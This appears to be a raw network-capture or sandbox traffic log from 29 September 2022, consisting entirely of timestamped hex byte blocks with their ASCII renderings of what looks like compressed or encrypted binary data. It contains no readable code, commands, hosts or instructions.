                                                                                                                                                    2022-09-29 12:59:14 UTC25271INData Raw: dc 00 d8 73 13 48 43 9f b8 3f 27 5a f3 05 cf 8a 64 67 99 f2 9d 6c 68 19 61 30 83 df 9f 0c e6 3a 77 6c 6a 0e a5 53 77 9b e9 b7 3f 77 a6 15 b7 ba 36 30 40 c9 be 03 f6 55 70 52 90 a7 02 0b c4 c9 e5 e9 1a 40 7f 71 8c e6 c8 7c 24 b3 7b d0 f9 d8 8a 23 46 ca aa 05 f3 e1 d9 41 1d ba 98 7b cb 8f 31 02 b8 9d 61 12 93 31 f9 dd d6 1e d1 3e 52 70 3b 03 8f 0c 6b f8 06 8e ff 4d 48 9a 1f 26 2c a7 91 0e 15 c0 8e 7f d8 50 3d 9b c9 8f c1 73 c0 48 86 0d 76 0e bc 4b 2a 72 d6 f2 6a c1 34 c6 45 bc 31 3c ed bb b8 b2 f5 c5 ec d1 2a 22 c8 98 a3 32 9e 99 06 cd 6d 7a 78 c4 10 50 f6 40 d6 ff 73 30 29 57 44 8d 01 8d be c7 02 54 90 91 5f 70 3b 40 c3 65 89 37 32 eb bf c6 2c 0e 23 7e 7e 8b 5e 8f 2c 07 40 80 0d 38 c4 19 de 9e 46 c8 27 74 74 8b b2 d8 b6 10 28 7d ad 47 3e e1 5b 53 83 11 be
                                                                                                                                                    Data Ascii: sHC?'Zdglha0:wljSw?w60@UpR@q|${#FA{1a1>Rp;kMH&,P=sHvK*rj4E1<*"2mzxP@s0)WDT_p;@e72,#~~^,@8F'tt(}G>[S
                                                                                                                                                    2022-09-29 12:59:14 UTC25287INData Raw: e8 73 b6 53 14 f6 13 3c f7 21 60 69 3f b8 13 34 a5 a6 2b b5 24 ec e0 24 2b 5b 59 6c dc 05 26 5c d2 ef be dc d3 43 9b 6f 7b 73 d4 31 31 e9 d6 df b9 e7 37 cf ae 38 b5 dc 16 0d ac af e5 07 2d d8 73 67 78 1b a0 3a 7d 77 14 14 aa b7 f4 7c 1d d3 9d e9 7b 65 b9 4b 33 89 f2 72 c7 b5 87 56 3e 7d 20 a4 8a 74 a5 9e db 95 bc cb 11 78 e2 06 06 e6 f6 86 dd c5 35 95 e8 ea 5b 08 cb bc a5 ab fb 92 a9 b4 fb 9c 1f 55 68 22 5c f1 31 a2 f1 42 e1 0e 47 6e 84 f4 c2 73 0a fb de 24 55 91 02 bb 77 7c 88 ef 3d d4 0f 3b a6 9d 4c 39 24 4d 96 23 51 c2 f0 f4 a2 b1 73 59 72 b0 e7 e5 ba 01 d5 99 88 38 51 2f 6b a7 f2 1c 18 2a b5 ca 2e e1 ac ef 05 0e b2 2f 34 69 54 2e 32 fa 8b 39 72 43 0b ba f4 99 11 4d 53 63 61 7a fc 4c e5 ba e6 a8 29 7a 85 0a 98 70 09 69 ee cc fa 80 e5 16 3f ac e5 58 6a
                                                                                                                                                    Data Ascii: sS<!`i?4+$$+[Yl&\Co{s1178-sgx:}w|{eK3rV>} tx5[Uh"\1BGns$Uw|=;L9$M#QsYr8Q/k*./4iT.29rCMScazL)zpi?Xj
                                                                                                                                                    2022-09-29 12:59:14 UTC25303INData Raw: f5 76 65 d0 78 2f 35 0f 68 1f a8 e2 40 ec ea 2c 5c 0a 86 44 5d df c7 4b 4b ff 47 d2 05 37 a6 cf 5d 71 a4 64 69 cb ed a9 7e 56 1f 5d 34 66 0e de 1e 12 20 ad 7e 2c 22 60 f6 12 92 0b 55 83 ed de b2 d5 65 da 03 a4 cb 19 46 95 9d b1 66 c8 73 45 04 06 3f 7d 7d e8 ed 86 85 ef 99 ec 81 3a 9d d7 bc 20 bd 79 ee 0f 65 c2 d2 24 a9 ba 75 14 63 70 00 49 c0 57 e0 56 33 b5 7f b6 a1 1f 7f dd 51 f3 08 ed d3 73 3f ec a0 57 3b 33 06 b8 1d 4e 7f d4 5b b7 ed 53 24 e6 68 29 15 f3 47 01 a5 0f f7 3c d5 59 5d cc 9f 13 08 db c4 8e 94 a0 a7 68 a8 f3 03 5b 68 54 18 e7 76 08 2d b3 08 59 66 25 90 4b 35 37 10 a1 18 24 00 90 2d f8 7c c0 3b 82 4c e4 06 07 53 a2 f6 1f 10 aa 5f de 5b ad 0e c1 8e b1 ad 0b 02 29 3d 37 99 b6 18 29 8e 61 6f ed 8d 59 97 e2 1f 2e 9d d3 8a 59 1c e7 f2 f3 7d 66 7f
                                                                                                                                                    Data Ascii: vex/5h@,\D]KKG7]qdi~V]4f ~,"`UeFfsE?}}: ye$ucpIWV3Qs?W;3N[S$h)G<Y]h[hTv-Yf%K57$-|;LS_[)=7)aoY.Y}f
                                                                                                                                                    2022-09-29 12:59:14 UTC25319INData Raw: ce 78 b1 f1 9c c1 fb 33 2d 60 bd bb a5 92 3f 38 5d ec 50 48 c2 6c 37 51 08 f7 56 1b c7 69 37 32 4c 4d 8e ba 30 60 49 d3 95 69 f8 40 32 87 9a 3c 77 54 82 73 f3 1b a5 ca 68 b0 81 95 64 3d bc 2d be 3d 3f 7e 7a fe 87 45 51 b2 ba fd c2 e4 83 6b 42 a2 54 32 90 bc 28 2a 01 9c c5 83 d1 01 5f 3c 64 89 a8 83 dd 7e 12 63 a9 4e f5 83 81 0c 9b 95 d8 fe cf 86 1b 5d f4 5e 51 9c 57 48 52 aa c1 b1 89 0b 93 09 aa 5d 3f 2e da dc fe 82 de a6 d1 5a 20 bb 50 bc 49 75 3d dd 66 87 0c c4 d0 34 c8 81 df ab db 45 66 c5 b7 c2 60 22 77 f4 60 83 db 84 76 19 f6 b6 7b 31 7c 5b f5 c3 fd 21 ac 07 78 f9 d0 d9 61 32 db 2e 50 ce 42 e1 1e c8 68 8d 11 0c 00 4c 6e ce 81 1a f5 d9 a1 87 72 5b 36 23 d0 af 53 ce e5 29 6d 53 9e 7a f1 83 6e 81 9e 41 30 58 d1 ab 8a be f8 e7 1c ca 88 a9 93 83 44 0e 9c
                                                                                                                                                    Data Ascii: x3-`?8]PHl7QVi72LM0`Ii@2<wTshd=-=?~zEQkBT2(*_<d~cN]^QWHR]?.Z PIu=f4Ef`"w`v{1|[!xa2.PBhLnr[6#S)mSznA0XD
                                                                                                                                                    2022-09-29 12:59:14 UTC25335INData Raw: f4 32 94 2e 2e 9e 9e a1 27 5d 0d 28 97 87 e0 43 7f c9 ea b0 3b 60 96 8b 4e c7 82 c5 2e 4c 8d 77 1d f1 82 7f 7d ff f8 4c 9f b7 c4 b6 72 04 e7 81 4d b6 c2 fc 3e 3d 05 ae c3 e9 30 d2 5d f5 11 1e 67 ff 09 d1 74 73 e1 f8 c5 92 c3 e3 fe e3 66 a6 f7 25 12 97 95 2c 58 22 0e af dc e7 3f e4 b2 c6 5c 50 8b 27 ad 03 b7 0a 4f 3e 61 ca 99 83 4e c5 eb b8 99 fc fc c8 28 1b 8f 09 94 c2 4c f9 9b 7e e8 06 01 f8 d0 53 0f b2 f7 64 86 f1 a0 41 f6 a9 4c 29 e9 a7 7b 8d 30 d0 74 22 7e a7 c9 4d c6 c0 ee 39 12 1c b9 9a 2a 48 4c 3b 3d 5c 06 cf 6c 7c 6f ce b5 fc 72 35 88 01 dc a9 e0 76 4d e3 81 19 0b 61 ef dd 78 52 0a 86 ce c0 a1 25 ce 1c f5 c4 f2 b6 be 74 80 a4 91 62 e1 a2 c9 3e 6c d5 21 0e e5 64 cf 99 0f 76 19 ba f0 ca 0f c5 9a a0 0e 55 b3 c2 9a 24 28 79 a0 61 df 42 4c 74 cb c0 8d
                                                                                                                                                    Data Ascii: 2..'](C;`N.Lw}LrM>=0]gtsf%,X"?\P'O>aN(L~SdAL){0t"~M9*HL;=\l|or5vMaxR%tb>l!dvU$(yaBLt
                                                                                                                                                    2022-09-29 12:59:14 UTC25351INData Raw: f3 48 cf f9 67 82 ef cc 41 ac 2e 6c ce cf 5a 6e 8e d5 71 10 35 99 81 71 86 9b 9f 3d 9e c7 55 ed 0a d0 07 24 e7 de 3d b1 23 ed 53 a6 ca aa 07 bc 0e 63 8c b6 fa 15 21 dc 04 59 0a a8 bb 0e 5f 43 f5 5f 83 e9 ca fa cc bd 79 e6 c7 8c 77 c3 08 74 41 90 20 6a df 10 a2 c3 4e eb be 22 e2 01 d8 e1 7c ad f4 d2 04 64 d4 ed 92 67 76 e9 fd e3 93 59 ba d8 f5 4a 7b f3 c9 08 b5 cb b4 3a b9 68 92 56 05 46 75 63 7a 0d 57 b4 ff 70 f6 7b 98 e6 81 e6 6f fb 1b f4 fc d4 0f 6b ae 0b 81 4d 7f 36 6d ac 42 46 21 f7 b6 db b1 20 62 48 f7 81 49 bb 1b 2d 42 02 f9 69 b9 c5 e6 9b 28 5f e6 94 f7 4a f1 7a be 68 c6 0e ad 47 b5 23 05 28 f6 71 f5 3c aa 0a 0d a7 69 de 23 44 08 de 1c ce af c7 5a 0e 68 79 92 58 93 76 f4 79 84 14 76 cf 29 95 48 9a e2 2d d4 5e 1f b8 cd 44 58 4b 97 5d 85 5e ed 29 4d
                                                                                                                                                    Data Ascii: HgA.lZnq5q=U$=#Sc!Y_C_ywtA jN"|dgvYJ{:hVFuczWp{okM6mBF! bHI-Bi(_JzhG#(q<i#DZhyXvyv)H-^DXK]^)M
                                                                                                                                                    2022-09-29 12:59:14 UTC25367INData Raw: e2 4d 8f aa 80 b4 11 98 02 3e 3b 27 1e 5c e8 76 67 06 09 cb 5e 2b fa d8 5c 2e 6b c4 ac 39 f2 ec a8 1a 93 14 09 09 c6 41 94 68 70 a5 4f 3a b2 5e d4 65 eb e8 51 e9 4d 36 48 70 86 50 f3 63 83 16 bf a1 1a fa 09 b9 7c 8f ef c1 0d c3 db 4a 60 26 7a f1 7c ab 3c a3 6e d0 c4 83 b5 8a 8d 2c 01 51 09 23 fc 24 4b 58 d4 7c 93 80 33 35 a0 77 22 11 2f 81 6a 35 e3 9c 53 13 4d 11 cb 4e 87 32 96 07 4f 34 87 82 2e b0 95 c9 fd 28 ab 15 50 6b 1b 8c ae 60 66 3f ca 52 21 37 f5 30 5e 0b b3 d2 a9 b8 11 73 ea ae 81 e5 ba af 3b 2b 0e d3 f0 5e 94 ce 29 2e e9 56 60 3d e5 2f 8d 97 63 c8 15 46 7c bc 52 37 dd 69 b8 36 8e b0 f5 17 8e 74 b7 fe 21 de a5 b9 a0 eb ee c2 c6 4c 83 de 75 02 e7 d8 06 a6 d7 d5 9f e9 ca 85 83 f3 33 4c d7 6c 61 dc ff 49 80 2b 02 2c 1c c2 5e 80 15 02 7e fc d7 47 27
                                                                                                                                                    Data Ascii: M>;'\vg^+\.k9AhpO:^eQM6HpPc|J`&z|<n,Q#$KX|35w"/j5SMN2O4.(Pk`f?R!70^s;+^).V`=/cF|R7i6t!Lu3LlaI+,^~G'
                                                                                                                                                    2022-09-29 12:59:14 UTC25383INData Raw: af fc a3 6e 42 c5 62 85 ac be 60 3e 80 93 d5 af 27 b4 b4 2f fb f7 d8 92 87 1e 15 9c a4 14 ac 8d f4 27 b3 1e 74 5a 6f 43 e3 4f 0d 79 c6 69 bc a1 1d 0f a3 94 b1 dd 1e e8 f8 72 32 6f 0d bf 57 84 22 87 90 87 0e b3 dc 13 64 49 74 6b 92 25 1b bc ae 06 cb d8 5a 6d a9 7f d6 6c f3 61 ae 20 f4 dd 99 46 49 3b 5e 18 c6 cb ce 79 a2 0b 94 8b c9 60 6d 3c 19 52 08 f7 f2 28 b8 34 12 ff 1a 86 80 61 81 c6 53 88 92 85 20 38 38 86 85 31 cd 90 b5 41 93 fc 7c a5 8e 08 2b 89 7e 10 aa 1d 0c 38 50 38 85 a9 63 a1 d7 4f 58 24 9f 72 8a d5 f5 77 5f 2b f5 cc 83 46 f3 e6 5e 68 5e 97 c3 47 81 d1 be d5 5a 09 ec 44 35 dc 6f 6a 35 74 d0 af 53 27 cd d5 fd 44 c8 5e e3 e7 c9 fe 14 2d 5a 11 44 6f 94 3b f6 f4 52 a9 e2 81 52 e2 c0 f0 72 9f 09 44 b5 62 37 5e 7d bc f0 40 59 c8 73 e4 ba fd 76 56 51
                                                                                                                                                    Data Ascii: nBb`>'/'tZoCOyir2oW"dItk%Zmla FI;^y`m<R(4aS 881A|+~8P8cOX$rw_+F^h^GZD5oj5tS'D^-ZDo;RRrDb7^}@YsvVQ
                                                                                                                                                    2022-09-29 12:59:14 UTC25399INData Raw: bd f1 6e 3e 58 2f ed 36 3e 82 90 35 ca d0 80 81 42 db 58 c2 4d 88 da 0e c4 97 d4 04 d4 6f 6f b9 83 f3 9a 8d 35 68 02 c8 8f 5d 2c eb a8 66 ba f0 15 1d 65 5a f8 d2 3f e2 7a 18 7b 01 4b 94 4e b2 ec 4f 97 1b 09 ca c9 7f 2f cf 91 89 a6 62 c2 43 01 27 7c 20 f1 b6 03 e8 d8 4a 1e 9a 35 d9 dd 33 ca 33 74 90 1b 96 0e e5 26 78 7c 74 02 76 f2 c5 7b 9b 6b c7 f4 1e b5 a9 78 c7 4b 05 c1 7f 47 36 3f cb d5 34 d2 e4 b8 e1 d0 e6 3d 20 e2 66 c5 ef b1 96 54 01 4d 89 a2 13 ab a0 87 3c 76 40 5f 49 68 b0 b9 60 a5 4b 2e a1 6b ed 4f 0b af b9 33 0b 35 eb 00 44 7e fa 88 e4 2c dd 55 e3 71 63 3c 98 d3 07 19 57 92 27 f0 0a 2d b9 01 0e 57 9d b2 f7 5f ec bd 08 9f b3 74 73 fa 1b e0 40 ac e6 dc b5 53 37 96 ae 28 42 17 8a 59 33 be 75 57 1f c0 58 f7 99 65 74 2c 75 7f de ab e5 04 f1 71 c7 81
                                                                                                                                                    Data Ascii: n>X/6>5BXMoo5h],feZ?z{KNO/bC'| J533t&x|tv{kxKG6?4= fTM<v@_Ih`K.kO35D~,Uqc<W'-W_ts@S7(BY3uWXet,uq
                                                                                                                                                    2022-09-29 12:59:14 UTC25415INData Raw: e7 41 67 2c 1c 20 b7 a6 53 1f cf 4a 2d f1 a5 f0 1d c4 2d 8a e3 e5 01 14 3b a3 4f 6c ef 54 b0 f2 0a 65 9e 1d 1b a5 e3 8b a7 08 66 36 0c 0f ac 9d 6c c9 49 44 98 14 a4 94 6a 5a ca 95 04 2c 37 1e 0b 4f 2e a5 c1 03 0d 82 42 aa 27 08 3e 9a cf 20 2e 8e 6e da 69 e2 f8 17 7c 3f ff e2 38 4e f8 6a f6 b2 5a f2 c1 d0 4e f1 cc d8 fe 95 54 a7 d3 15 d1 d5 41 76 f7 61 61 22 5f b5 3c 83 e0 43 0e b5 92 09 66 be e8 a8 36 88 e6 90 0e 11 7d 53 dd 63 c7 6d 7f cb 8d 06 a4 e7 c1 86 3c 67 3c 10 f1 47 54 74 81 28 8d 54 9d af e8 27 ac 12 9b 4b f8 43 fb c7 1b 86 70 9b cb 98 03 f6 4c a9 fb d4 39 3c 15 59 ad 6d d7 41 3f 88 c7 d0 45 2f 64 48 8f aa c4 be 2b b5 cc 78 9d 37 8a ce d5 be c0 92 84 d0 aa a3 ce 35 7b 9d 45 73 07 5d 19 e3 a8 38 45 8d 34 c0 6a 66 9d 5a 6c e4 75 77 aa cf 4f 0b 7e
                                                                                                                                                    Data Ascii: Ag, SJ--;OlTef6lIDjZ,7O.B'> .ni|?8NjZNTAvaa"_<Cf6}Scm<g<GTt(T'KCpL9<YmA?E/dH+x75{Es]8E4jfZluwO~
                                                                                                                                                    2022-09-29 12:59:14 UTC25431INData Raw: 48 f6 ac 4d 54 ed f3 d2 fb 92 6d 77 51 18 e9 25 38 37 92 14 bd ce e1 9a 5a 65 3b 2a aa 6f ea c9 d2 74 51 47 26 00 13 60 9b 85 6a fe 07 54 59 95 68 b8 fa f1 b0 0a f8 de cf d8 d8 6d 3f ec fd 33 37 3e 3d 06 70 f3 f6 50 9b c5 73 6f 2d 4f 58 19 41 e9 78 ed b0 b5 28 96 a9 26 c0 de d8 8f 3d 65 e9 84 fb 4a ec ab ed dc 6e 2b 62 57 e8 cd 67 88 e5 a1 ff 0c 91 06 7b c8 27 ab 09 52 bd 01 ec 7c f3 02 0c c5 be dd ab 9d ee b9 18 83 8d 37 34 61 0d 9f e8 cb 6c fd 60 5d 46 e8 0c 31 8e 18 61 8b fb bf 55 a7 70 e9 64 78 e3 5e f4 d0 93 4e 81 80 12 40 83 93 c7 c8 82 9f 6a 17 e3 7c d8 43 5d 03 3e ed 27 de cd 68 cb 61 1b fe 4a 24 6d 36 ba 64 a8 76 1e e0 d0 36 c7 23 60 64 2a d4 d0 0d 74 63 6d e7 e1 81 14 87 50 0a ed 8e 64 a6 4c 9f ad 78 be f7 9f 94 a0 a9 7f a8 69 5f 6c df a6 59 bc
                                                                                                                                                    Data Ascii: HMTmwQ%87Ze;*otQG&`jTYhm?37>=pPso-OXAx(&=eJn+bWg{'R|74al`]F1aUpdx^N@j|C]>'haJ$m6dv6#`d*tcmPdLxi_lY
                                                                                                                                                    2022-09-29 12:59:14 UTC25447INData Raw: 11 a2 61 56 33 d3 9c 76 5f 4c 8e 67 1a 27 b1 25 3d 3c bf e2 23 07 f3 58 76 79 c6 1e 19 3f 63 eb a7 3d 7b ad 01 1a 05 6b 4a 30 50 a2 d5 c4 41 32 3c 63 26 8b ea 9b 80 77 f0 76 08 7d 9b 5b 66 a9 92 05 04 a2 3e fe 6d 3e 3f 6c 42 bd 8c d0 3b 01 c3 b3 8e 5b ae f6 b0 31 e0 48 2d 47 4a 07 82 43 40 7a d0 70 6e 4e 59 87 83 c3 25 0b 31 53 1d 26 5d 0b 58 ed 4d 29 d2 58 33 26 9d 52 c0 fe 8b 7a d1 0b 53 76 ee da c3 54 dc 80 c7 74 c9 f0 fc 54 50 00 f7 89 4c 88 b4 3f 0f 3c 4b 3b e1 52 b1 2d 23 1d 99 c1 43 8a 4a 4e 55 8f e6 4a 01 c1 6a fc b1 22 db 98 a7 94 6f 95 7f 72 7b a9 61 6f 37 fe 42 92 4b c3 e9 47 9f 29 9b 21 bc 81 d1 62 6b 96 09 dd 36 59 96 4b c2 51 55 34 ff c8 6a 1c 8a 93 59 53 b2 4c 7f 5d 8b ac 1d 9e 0f dd 5d 24 f6 fe ef 53 81 c0 7b 43 35 6f 2c f2 27 d6 9a 47 6d
                                                                                                                                                    Data Ascii: aV3v_Lg'%=<#Xvy?c={kJ0PA2<c&wv}[f>m>?lB;[1H-GJC@zpnNY%1S&]XM)X3&RzSvTtTPL?<K;R-#CJNUJj"or{ao7BKG)!bk6YKQU4jYSL]]$S{C5o,'Gm
                                                                                                                                                    2022-09-29 12:59:14 UTC25463INData Raw: da ba 57 6e 92 55 d2 61 a9 a3 30 3e 6f 59 b6 93 8b 1e 05 34 e1 aa 42 67 58 ab 2a 6a ea ea 89 af b3 f4 d3 a0 2b 53 34 5c c2 76 db 86 4c 58 4e d1 75 e2 1e 96 6f 09 48 34 42 d5 96 ce ec 6c c4 fa 4f 16 9f 89 b9 fa 06 f6 f7 61 ec 4c 7b 77 60 9f 83 1e aa 66 27 87 a1 e4 4a 75 60 e4 0c 9b f5 80 2d f0 4e e7 ee c1 3d 37 99 ee d3 b1 e8 fe 5f b7 16 09 1d 13 d8 ea e3 22 54 64 eb 12 4c 9d c9 16 eb 2e b9 7a 43 ba 41 18 c3 bc c4 36 99 16 28 21 69 30 40 17 62 0a de f5 73 2b 2d 10 14 e2 82 97 d8 87 82 22 20 a8 b4 86 12 c6 d9 68 6f 5d 2a 81 50 f0 4a 51 d9 fe 94 fc 6a 99 e6 31 ba 01 f4 23 d2 e2 f7 c2 26 9d b5 cb f8 45 3f 7a 6e b5 e0 62 a1 1d 5d 78 11 18 3d 20 41 79 d6 1c a1 77 21 59 3f c2 69 a3 01 11 6a e4 b9 4d 74 49 c6 d5 fb f7 f1 d6 80 ba 40 f6 db d6 99 13 42 8c 23 67 dc
                                                                                                                                                    Data Ascii: WnUa0>oY4BgX*j+S4\vLXNuoH4BlOaL{w`f'Ju`-N=7_"TdL.zCA6(!i0@bs+-" ho]*PJQj1#&E?znb]x= Ayw!Y?ijMtI@B#g
                                                                                                                                                    2022-09-29 12:59:14 UTC25479INData Raw: a0 93 71 3a e2 3d a3 af 09 7c 33 4e 1e 00 a1 ac a6 6f 81 18 29 2d ff 1d de 47 cf d1 98 c4 71 b0 b6 4a b6 76 8a 99 e4 e4 a2 e8 b7 20 5c b3 c8 15 90 62 e6 dc ef 5a ed 56 5f 7b fc 08 26 73 4f 28 bc 91 df 26 0b f2 32 ab fb 63 55 30 2a 8b 4d 46 51 a4 e7 19 f1 e9 65 63 81 dc a1 fa 42 b0 58 0d b1 7e d3 61 70 2b c4 13 dc f2 d5 d8 1c 71 22 2f 7e 76 29 14 01 de cd 20 f3 9f aa ff 74 a7 50 34 34 2c a7 ee 2f 60 cb 86 63 df 5c bd 07 c2 81 db d7 a7 f3 58 2e 02 e4 50 73 19 e0 20 64 52 2d 2f ec 16 2f cc 0b 9d 27 4a 99 51 05 ff d0 8f 67 dc c8 20 50 a0 38 03 f2 27 8a 36 d1 d5 4a bc 9a 1b 72 6e 02 82 c1 71 85 8c 2e 77 7f 12 17 d2 1c 75 39 0b 5c 7b 3e 40 03 74 27 5a 1d 43 29 51 d6 59 a5 73 b8 94 a3 ed 08 fb 87 89 99 3e f0 90 d3 d3 d3 ee d5 77 8a e3 4d 81 88 b4 e6 95 b2 06 89
                                                                                                                                                    Data Ascii: q:=|3No)-GqJv \bZV_{&sO(&2cU0*MFQecBX~ap+q"/~v) tP44,/`c\X.Ps dR-//'JQg P8'6Jrnq.wu9\{>@t'ZC)QYs>wM
                                                                                                                                                    2022-09-29 12:59:14 UTC25495INData Raw: d0 da 94 08 99 4a cb fa 96 83 e1 7f a0 f8 ba 6e 24 c5 bc b6 b3 96 62 cc 45 86 d1 ac 12 6c 9a 41 b8 a5 7b f9 86 c5 47 d8 c2 5c be b9 e5 d9 34 29 9a c5 7f b4 a0 75 e3 8e 67 c4 ef 91 4d 48 5a 12 e1 0c b9 ab f8 9c 14 dc 6c e6 98 6c bf 0d 08 43 e8 63 06 76 3b 15 b4 02 a0 60 38 57 43 9a b4 1f 83 6f 34 41 50 18 a3 d9 ec f1 34 54 b4 bc 60 9f c6 46 4a 1b 38 c9 10 cb d5 6d 7f 92 3e b6 48 27 97 bb 6b cb 77 74 19 23 25 b1 f1 3d 1d 75 7a 47 92 24 ac c4 b0 3f a8 be 63 64 8c 9c 9a c3 8a 14 43 a3 ce b9 ac 95 63 3d 9e ee 9d 88 d9 e0 ca ee c4 c0 0d b3 99 30 e6 2a 85 c5 1e dd f6 35 5c 9c 64 a8 ae 07 70 91 c2 ac 7a 41 34 04 0c 5d e2 24 0c 27 75 2a 1c ef 7c a7 54 eb 5d b0 85 d7 ab 4b 50 b3 83 54 5e 57 41 27 f2 bd 55 b5 f7 5f b7 e1 b2 25 c1 e3 16 81 b2 e6 c8 85 af c1 ae eb d0
                                                                                                                                                    Data Ascii: Jn$bElA{G\4)ugMHZllCcv;`8WCo4AP4T`FJ8m>H'kwt#%=uzG$?cdCc=0*5\dpzA4]$'u*|T]KPT^WA'U_%
                                                                                                                                                    2022-09-29 12:59:14 UTC25511INData Raw: de 51 3e 8a 18 76 50 3e fa 45 d5 f7 a0 82 af 5f 62 5f 43 a5 11 12 2a b5 30 11 2d 4d 1e 3d 57 94 a2 62 e5 77 33 fc 10 60 16 d8 23 b0 70 e1 9b ec da 25 e6 5a c1 79 ba 3c 1b ee c3 a5 38 a6 1c e2 ac 63 69 4e d0 50 f9 ed f0 d8 71 24 b0 d8 54 45 df 74 90 f9 eb 98 61 c1 41 5c 93 64 39 56 94 20 bc af 3c be 24 68 cd ea 32 03 5c 22 5a 22 a6 3c 4d 81 85 fc c0 6c a5 6d 5b 94 e8 e0 31 7c f7 50 3d 50 ab a3 07 d3 60 b8 a0 1a 5a 3e 82 9f 6a 4e 06 5b a8 75 6c 73 88 40 a2 4a de 42 7d a8 cf c5 71 fe d6 34 fb 2a 5b 46 a1 ef 23 93 43 2a 13 13 ed 1f 8d dc 81 f5 95 a3 21 2e 64 1e 16 fb d6 7a be f6 2b 8d e1 c7 c3 86 44 53 eb 8e 5a 3a bc 51 b3 94 5f a2 a6 5a e7 fe 55 56 af 87 a3 bd 71 af b0 39 22 65 77 aa ff cc ba d0 ea 6e 35 c7 36 08 e0 ec 86 24 c1 82 0d 58 36 84 d1 4d db dc 84
                                                                                                                                                    Data Ascii: Q>vP>E_b_C*0-M=Wbw3`#p%Zy<8ciNPq$TEtaA\d9V <$h2\"Z"<Mlm[1|P=P`Z>jN[uls@JB}q4*[F#C*!.dz+DSZ:Q_ZUVq9"ewn56$X6M
                                                                                                                                                    2022-09-29 12:59:14 UTC25527INData Raw: 7b 8a 4e c8 10 10 00 55 e6 ac ff 3e 4d ff 29 e6 26 48 32 21 ec 57 6c 6b f0 92 eb 22 c2 d1 af e0 1a 08 15 68 5f ef 91 3f a0 10 1f 66 70 72 e1 2a a2 c9 c3 75 d2 52 bc e8 cf a2 b1 97 3d 08 41 91 bd 66 a0 ba a8 76 5d e6 23 b7 43 57 ea 78 ac f4 5a 01 b2 c6 84 76 ef cc 9b 6f 7e 44 56 7f ae fe ca 20 7f ff 9a 7b 95 a1 bd dc 01 dc 77 f8 7f 2a 8c 7c 93 f7 b6 12 b5 c4 96 65 2f 77 a6 de 48 aa f2 6e ed d0 f8 31 7a 8e ae 79 e9 ba 62 c4 20 66 96 38 10 6e 59 fd 4f 00 a0 22 3d 56 3a eb 6e ad d6 9d 27 6e 0f 7c d3 72 9c 91 8a a4 3a 82 8b d6 ec 55 c7 60 8b ba b6 13 88 ef 50 c3 8f fc 26 eb d0 40 a1 1b bc 71 41 d3 e5 c1 50 f9 1c a0 ca 41 b8 61 d2 9c 4b 7b 2b 33 a0 f8 b6 51 8e 01 6a 24 e5 0a 02 a7 06 c4 63 81 46 fb 9e 17 1e e5 34 5b 33 79 e2 f4 23 eb 89 e5 59 0d 87 4a 4a 91 8b
                                                                                                                                                    Data Ascii: {NU>M)&H2!Wlk"h_?fpr*uR=Afv]#CWxZvo~DV {w*|e/wHn1zyb f8nYO"=V:n'n|r:U`P&@qAPAaK{+3Qj$cF4[3y#YJJ
                                                                                                                                                    2022-09-29 12:59:14 UTC25543INData Raw: 54 0e 9a 6c 14 71 a2 e2 b3 1d 2e 89 b9 72 b2 2e 99 cb 7f 23 d8 06 73 84 1c 2d 7f 1a 9a 3b de b4 7c b0 bc 00 11 00 a6 b6 82 37 8c 88 ad 1f e5 ec 79 d4 e7 96 6a 52 92 02 52 05 a0 61 ff 36 50 89 81 bc 7b 7b 2c 19 8c 91 65 2d f4 77 54 96 46 c5 b8 16 e9 d8 a6 22 0a 13 5a 56 95 5c 47 8f 95 76 98 6b 20 8d 49 5a 70 bd a0 5d dd 47 fd a2 2f ad 6b 59 c6 95 79 b2 d3 a6 a8 1b 22 f4 b9 f7 b6 6d 55 dc a3 6a 91 b4 f5 7c 0b ac 52 84 39 f3 52 79 ac 17 fe 69 30 b2 81 de 0e f7 9f 4b fe e4 e4 c6 d7 37 56 21 c5 60 96 6d 37 85 5f 60 02 66 0f 55 fa 13 37 b1 0e 4d fe ce e8 29 19 0d c7 80 cc fb 41 1b 37 da 6d eb 38 e7 89 6d 0f 33 7f a0 ae b7 4d c6 fc da 43 f4 04 80 99 af ec 3c 9e 74 96 1a 39 64 07 e6 e6 1c f7 dc b5 a3 e7 1a e2 c9 b9 a4 20 e0 ab 11 e4 cc fe 43 f5 b9 e8 6c e7 ed 66
                                                                                                                                                    Data Ascii: Tlq.r.#s-;|7yjRRa6P{{,e-wTF"ZV\Gvk IZp]G/kYy"mUj|R9Ryi0K7V!`m7_`fU7M)A7m8m3MC<t9d Clf
                                                                                                                                                    2022-09-29 12:59:14 UTC25559INData Raw: 0c 12 94 78 76 df 6d b0 b5 7e 3e c1 3d e9 18 90 62 67 1b 14 0a 12 db 98 4b c6 ef 47 d0 b6 e5 3d 96 85 17 f3 39 b3 ab df d9 5a 80 29 1f 4d 6a f3 f4 42 1b 04 b6 05 76 51 83 4d dc 13 12 62 b6 54 b0 fb 67 dc 40 3d c8 33 0c 39 a3 a5 35 9d ca 3f b0 f8 ad d5 01 be 2e 32 aa 43 01 8d 13 d3 84 30 10 21 32 72 31 52 d3 42 85 7f cd b2 c1 26 26 a7 49 50 37 26 84 4a a7 c7 bc d1 10 c6 43 0e 2a fe 81 88 41 01 de a5 54 0d 01 c9 8c c4 6b 40 3c 8e f0 cf dc 8b 99 71 30 1d 50 62 47 bf 18 4f 34 14 53 2b c6 ed 6d c8 0b 18 a5 0e 9d 7b bb 97 09 a7 29 f2 5d a8 96 0f d4 58 8f e5 3e 62 b7 f1 28 da 0a 20 b6 f2 0e 55 53 b1 54 d0 09 5d 45 d1 52 77 f0 38 d5 79 bf de 27 9d 50 6d 04 36 47 0b 97 15 18 2f ae 95 a3 27 f8 7f 72 9a 32 72 e2 2c d9 13 16 28 a2 ff ff 86 18 4a 44 7c d2 bf bb 2a 0f
                                                                                                                                                    Data Ascii: xvm~>=bgKG=9Z)MjBvQMbTg@=395?.2C0!2r1RB&&IP7&JC*ATk@<q0PbGO4S+m{)]X>b( UST]ERw8y'Pm6G/'r2r,(JD|*
